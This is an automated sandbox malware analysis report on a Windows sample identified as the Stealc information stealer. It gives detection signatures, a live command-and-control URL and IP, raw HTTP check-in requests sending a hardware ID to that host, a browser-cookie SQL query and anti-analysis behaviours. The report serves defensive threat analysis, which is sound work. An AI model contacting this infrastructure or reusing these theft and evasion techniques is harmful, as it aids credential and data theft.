Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1544128
MD5:37ad51a72ae2ee4f18f90db961ca42e0
SHA1:4e981723fa01e7aa8f81b23c734a13b2cdb9e252
SHA256:33c2bf98bb8da8afa179fd90efc0b686e9eca69ffa2ab5b8163ece46a90ff561
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse usering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 6552 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 37AD51A72AE2EE4F18F90DB961CA42E0)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.2197299043.0000000000E1E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000003.2154333507.0000000004B60000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 6552JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 6552JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.110000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-28T21:41:05.720999+010020442431Malware Command and Control Activity Detected192.168.2.649710185.215.113.20680TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Found malware configuration
                Source: 0.2.file.exe.110000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
                Multi AV Scanner detection for submitted file
                Source: file.exeReversingLabs: Detection: 39%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00129030 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00129030
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0011A210 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_0011A210
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0011A2B0 CryptUnprotectData,LocalAlloc,LocalFree,0_2_0011A2B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001172A0 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_001172A0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0011C920 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_0011C920
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Binary string: my_library.pdbU source: file.exe, 00000000.00000003.2154333507.0000000004B8B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp
                Source: Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000003.2154333507.0000000004B8B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001240F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_001240F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0011E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0011E530
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00111710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00111710
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0011F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0011F7B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001247C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_001247C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00123B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00123B00
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00124B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00124B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0011DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0011DB80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0011EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0011EE20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0011BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0011BE40
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0011DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0011DF10

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49710 -> 185.215.113.206:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.206/6c4adf523b719729.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AECAECFCAAEBFHIEHDGHHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 45 35 34 37 34 42 46 32 42 45 34 31 38 36 36 34 38 36 36 33 36 0d 0a 2d 2d 2d 2d 2d 2d 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 47 48 2d 2d 0d 0a Data Ascii: ------AECAECFCAAEBFHIEHDGHContent-Disposition: form-data; name="hwid"7E5474BF2BE41866486636------AECAECFCAAEBFHIEHDGHContent-Disposition: form-data; name="build"tale------AECAECFCAAEBFHIEHDGH--
                Source: Joe Sandbox ViewIP Address: 185.215.113.206 185.215.113.206
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001162D0 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_001162D0
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AECAECFCAAEBFHIEHDGHHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 45 35 34 37 34 42 46 32 42 45 34 31 38 36 36 34 38 36 36 33 36 0d 0a 2d 2d 2d 2d 2d 2d 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 47 48 2d 2d 0d 0a Data Ascii: ------AECAECFCAAEBFHIEHDGHContent-Disposition: form-data; name="hwid"7E5474BF2BE41866486636------AECAECFCAAEBFHIEHDGHContent-Disposition: form-data; name="build"tale------AECAECFCAAEBFHIEHDGH--
                Source: file.exe, 00000000.00000002.2197299043.0000000000E1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206
                Source: file.exe, 00000000.00000002.2197299043.0000000000E1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/
                Source: file.exe, 00000000.00000002.2197299043.0000000000E78000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2197299043.0000000000E1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php
                Source: file.exe, 00000000.00000002.2197299043.0000000000E78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php%.&
                Source: file.exe, 00000000.00000002.2197299043.0000000000E78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php-
                Source: file.exe, 00000000.00000002.2197299043.0000000000E78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php/r
                Source: file.exe, 00000000.00000002.2197299043.0000000000E78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpW
                Source: file.exe, 00000000.00000002.2197299043.0000000000E78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpe/
                Source: file.exe, 00000000.00000002.2197299043.0000000000E78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpu.
                Source: file.exe, 00000000.00000002.2197299043.0000000000E78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/P
                Source: file.exe, file.exe, 00000000.00000003.2154333507.0000000004B8B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0056E0250_2_0056E025
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001500980_2_00150098
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005730CC0_2_005730CC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0057D09D0_2_0057D09D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001421380_2_00142138
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005821290_2_00582129
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0016B1980_2_0016B198
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0017E2580_2_0017E258
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001542880_2_00154288
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0019B3080_2_0019B308
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0018D39E0_2_0018D39E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0056C3E90_2_0056C3E9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0057B4D60_2_0057B4D6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0013E5440_2_0013E544
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001345730_2_00134573
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001545A80_2_001545A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0017D5A80_2_0017D5A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004985AD0_2_004985AD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0018A6480_2_0018A648
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0058060B0_2_0058060B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004FF62E0_2_004FF62E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004426230_2_00442623
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001566C80_2_001566C8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001996FD0_2_001996FD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0068D75D0_2_0068D75D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0016D7200_2_0016D720
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001867990_2_00186799
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001648680_2_00164868
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001698B80_2_001698B8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0016B8A80_2_0016B8A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0017F8D60_2_0017F8D6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005799B80_2_005799B8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0056FA530_2_0056FA53
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0057EA1E0_2_0057EA1E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00574AF40_2_00574AF4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0056AB670_2_0056AB67
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00180B880_2_00180B88
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00184BA80_2_00184BA8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00604BAD0_2_00604BAD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00178BD90_2_00178BD9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0018AC280_2_0018AC28
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0017AD380_2_0017AD38
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00561D1F0_2_00561D1F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00141D780_2_00141D78
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0016BD680_2_0016BD68
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00165DB90_2_00165DB9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00164DC80_2_00164DC8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00158E780_2_00158E78
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00181EE80_2_00181EE8
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 00114610 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: szuavcfa ZLIB complexity 0.9949861187591776
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00129790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00129790
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00123970 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00123970
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\GOB92GLS.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exe, 00000000.00000002.2197299043.0000000000E1E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies;
                Source: file.exeReversingLabs: Detection: 39%
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 2181632 > 1048576
                Source: file.exeStatic PE information: Raw size of szuavcfa is bigger than: 0x100000 < 0x1a9a00
                Source: Binary string: my_library.pdbU source: file.exe, 00000000.00000003.2154333507.0000000004B8B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp
                Source: Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000003.2154333507.0000000004B8B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.110000.0.unpack :EW;.rsrc :W;.idata :W; :EW;szuavcfa:EW;lozgslii:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;szuavcfa:EW;lozgslii:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00129BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00129BB0
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x21cca0 should be: 0x22296e
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: szuavcfa
                Source: file.exeStatic PE information: section name: lozgslii
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00612047 push ecx; mov dword ptr [esp], 7E3F3F00h0_2_0061206A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0012E02B push cs; iretd 0_2_0012E036
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00657009 push ebp; mov dword ptr [esp], ebx0_2_0065702C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0056E025 push 4E48FB59h; mov dword ptr [esp], edx0_2_0056E04F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0056E025 push ecx; mov dword ptr [esp], esi0_2_0056E05B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0056E025 push 768703AAh; mov dword ptr [esp], edi0_2_0056E122
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0056E025 push edx; mov dword ptr [esp], 19365585h0_2_0056E160
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0056E025 push edi; mov dword ptr [esp], 6DD033CDh0_2_0056E1FA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0056E025 push ebx; mov dword ptr [esp], eax0_2_0056E2BF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0056E025 push eax; mov dword ptr [esp], 54A5B707h0_2_0056E382
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0056E025 push esi; mov dword ptr [esp], 4EC3CA82h0_2_0056E491
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0056E025 push 5B524D41h; mov dword ptr [esp], ebx0_2_0056E4A6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0056E025 push esi; mov dword ptr [esp], eax0_2_0056E4FD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0056E025 push 5654AD88h; mov dword ptr [esp], edi0_2_0056E54C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0056E025 push 7C76FF66h; mov dword ptr [esp], eax0_2_0056E554
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0056E025 push ecx; mov dword ptr [esp], 409F48C3h0_2_0056E580
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0056E025 push edi; mov dword ptr [esp], 62CE68D2h0_2_0056E59E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0056E025 push 188E7A42h; mov dword ptr [esp], edi0_2_0056E5CA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0056E025 push ebp; mov dword ptr [esp], ebx0_2_0056E5EC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0056E025 push 0253C8F9h; mov dword ptr [esp], ecx0_2_0056E669
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0056E025 push ebx; mov dword ptr [esp], edi0_2_0056E6AB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0056E025 push ebp; mov dword ptr [esp], 5BD0D8C0h0_2_0056E775
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0056E025 push ebp; mov dword ptr [esp], edx0_2_0056E827
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0056E025 push ebx; mov dword ptr [esp], 09327C00h0_2_0056E842
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0056E025 push edi; mov dword ptr [esp], 262B941Bh0_2_0056E84D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0056E025 push 3A87A992h; mov dword ptr [esp], eax0_2_0056E864
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0056E025 push ecx; mov dword ptr [esp], edx0_2_0056E8DF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0056E025 push eax; mov dword ptr [esp], ecx0_2_0056E8F1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0056E025 push esi; mov dword ptr [esp], 55989DADh0_2_0056E902
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0056E025 push edi; mov dword ptr [esp], 4B6E6541h0_2_0056E924
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0056E025 push edx; mov dword ptr [esp], 7F1F2D8Dh0_2_0056E939
                Source: file.exeStatic PE information: section name: szuavcfa entropy: 7.954150406224703

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
